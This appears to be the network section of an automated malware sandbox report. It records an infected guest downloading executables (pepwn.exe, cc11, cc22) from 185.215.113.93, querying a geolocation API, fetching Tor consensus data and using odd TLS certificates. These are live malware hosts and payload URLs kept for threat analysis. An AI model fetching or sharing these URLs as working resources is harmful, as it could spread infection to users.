Network Analysis
IP Address | Status | Action |
---|---|---|
130.185.250.214 | Active | Moloch |
131.188.40.189 | Active | Moloch |
141.255.162.34 | Active | Moloch |
149.56.45.200 | Active | Moloch |
164.124.101.2 | Active | Moloch |
173.75.39.61 | Active | Moloch |
185.215.113.93 | Active | Moloch |
193.11.164.243 | Active | Moloch |
212.83.168.196 | Active | Moloch |
23.129.64.201 | Active | Moloch |
46.105.121.228 | Active | Moloch |
Name | Response | Post-Analysis Lookup |
---|---|---|
api.wipmania.com | 212.83.168.196 | |
TCP Requests
- 192.168.56.101:49214 -> 131.188.40.189:443
- 192.168.56.101:49211 -> 149.56.45.200:9030
- 192.168.56.101:49212 -> 173.75.39.61:9001
- 192.168.56.101:49200 -> 185.215.113.93:80
- 192.168.56.101:49209 -> 185.215.113.93:80
- 192.168.56.101:49216 -> 185.215.113.93:80
- 192.168.56.101:49215 -> 193.11.164.243:9030
- 192.168.56.101:49203 -> 212.83.168.196:80 (api.wipmania.com)
- 192.168.56.101:49205 -> 212.83.168.196:80 (api.wipmania.com)
- 192.168.56.101:49218 -> 212.83.168.196:80 (api.wipmania.com)
- 192.168.56.101:49208 -> 23.129.64.201:80
- 192.168.56.101:49220 -> 23.129.64.201:80
- 192.168.56.101:49213 -> 46.105.121.228:9100
UDP Requests
- 192.168.56.101:61479 -> 164.124.101.2:53
- 192.168.56.101:62324 -> 164.124.101.2:53
- 192.168.56.101:137 -> 192.168.56.255:137
- 192.168.56.101:138 -> 192.168.56.255:138
- 192.168.56.101:49152 -> 239.255.255.250:3702
- 192.168.56.101:62325 -> 239.255.255.250:3702
- 192.168.56.101:62445 -> 239.255.255.250:1900
- 192.168.56.101:62447 -> 239.255.255.250:3702
- 192.168.56.101:62449 -> 239.255.255.250:3702
- 52.231.114.183:123 -> 192.168.56.101:123
GET 200 http://185.215.113.93/pepwn.exe
REQUEST
GET /pepwn.exe HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
Host: 185.215.113.93
RESPONSE
HTTP/1.1 200 OK
Server: nginx
Date: Tue, 04 May 2021 02:17:24 GMT
Content-Type: application/octet-stream
Content-Length: 102912
Last-Modified: Sun, 02 May 2021 20:35:10 GMT
Connection: keep-alive
ETag: "608f0cfe-19200"
Accept-Ranges: bytes
GET 200 http://api.wipmania.com/
REQUEST
GET / HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.90 Safari/537.36
Host: api.wipmania.com
RESPONSE
HTTP/1.1 200 OK
Server: nginx
Date: Tue, 04 May 2021 02:17:31 GMT
Content-Type: text/html
Content-Length: 21
Connection: keep-alive
Keep-Alive: timeout=20
GET 200 http://api.wipmania.com/
REQUEST
GET / HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.90 Safari/537.36
Host: api.wipmania.com
RESPONSE
HTTP/1.1 200 OK
Server: nginx
Date: Tue, 04 May 2021 02:17:44 GMT
Content-Type: text/html
Content-Length: 21
Connection: keep-alive
Keep-Alive: timeout=20
GET 200 http://23.129.64.201/tor/status-vote/current/consensus.z
REQUEST
GET /tor/status-vote/current/consensus.z HTTP/1.1
Cache-Control: no-cache
Accept-Encoding: gzip
Host: 23.129.64.201
Connection: Close
RESPONSE
HTTP/1.0 200 OK
Date: Tue, 04 May 2021 02:17:51 GMT
Content-Type: text/plain
X-Your-Address-Is: 175.208.134.150
Content-Encoding: deflate
Expires: Tue, 04 May 2021 03:00:00 GMT
Vary: X-Or-Diff-From-Consensus
GET 200 http://185.215.113.93/cc11
REQUEST
GET /cc11 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.90 Safari/537.36
Host: 185.215.113.93
RESPONSE
HTTP/1.1 200 OK
Server: nginx
Date: Tue, 04 May 2021 02:17:54 GMT
Content-Type: application/octet-stream
Content-Length: 103432
Last-Modified: Sun, 02 May 2021 18:15:21 GMT
Connection: keep-alive
ETag: "608eec39-19408"
Accept-Ranges: bytes
GET 200 http://185.215.113.93/cc11
REQUEST
GET /cc11 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.90 Safari/537.36
Host: 185.215.113.93
RESPONSE
HTTP/1.1 200 OK
Server: nginx
Date: Tue, 04 May 2021 02:18:24 GMT
Content-Type: application/octet-stream
Content-Length: 103432
Last-Modified: Sun, 02 May 2021 18:15:21 GMT
Connection: keep-alive
ETag: "608eec39-19408"
Accept-Ranges: bytes
GET 200 http://185.215.113.93/cc22
REQUEST
GET /cc22 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.90 Safari/537.36
Host: 185.215.113.93
RESPONSE
HTTP/1.1 200 OK
Server: nginx
Date: Tue, 04 May 2021 02:18:31 GMT
Content-Type: application/octet-stream
Content-Length: 103432
Last-Modified: Sun, 02 May 2021 18:20:42 GMT
Connection: keep-alive
ETag: "608eed7a-19408"
Accept-Ranges: bytes
GET 200 http://api.wipmania.com/
REQUEST
GET / HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.90 Safari/537.36
Host: api.wipmania.com
RESPONSE
HTTP/1.1 200 OK
Server: nginx
Date: Tue, 04 May 2021 02:18:33 GMT
Content-Type: text/html
Content-Length: 21
Connection: keep-alive
Keep-Alive: timeout=20
GET 200 http://23.129.64.201/tor/status-vote/current/consensus.z
REQUEST
GET /tor/status-vote/current/consensus.z HTTP/1.1
Cache-Control: no-cache
Accept-Encoding: gzip
Host: 23.129.64.201
Connection: Close
RESPONSE
HTTP/1.0 200 OK
Date: Tue, 04 May 2021 02:19:17 GMT
Content-Type: text/plain
X-Your-Address-Is: 175.208.134.150
Content-Encoding: deflate
Expires: Tue, 04 May 2021 03:00:00 GMT
Vary: X-Or-Diff-From-Consensus
ICMP traffic
No ICMP traffic performed.
IRC traffic
Command | Params | Type |
---|---|---|
CONNECT | %s:%s HTTP/1.0 | client |
CONNECT | %s:%s HTTP/1.1 | client |
Suricata Alerts
Suricata TLS
Flow | Issuer | Subject | Fingerprint |
---|---|---|---|
TLSv1 192.168.56.101:49213 -> 46.105.121.228:9100 | CN=www.bwngpox3bvalfmorvip.com | CN=www.rxshttafrocltee.net | d2:47:05:7d:2c:eb:e7:41:65:f3:7b:03:43:39:b6:ae:51:14:d3:42 |
TLSv1 192.168.56.101:49212 -> 173.75.39.61:9001 | CN=www.4y5zm6ezqlkhbs2ix.com | CN=www.5ul6h6l4.net | dd:c6:e9:d1:7f:2e:55:3b:46:92:22:14:6d:d3:0c:85:e3:5a:8d:b6 |
Snort Alerts
No Snort Alerts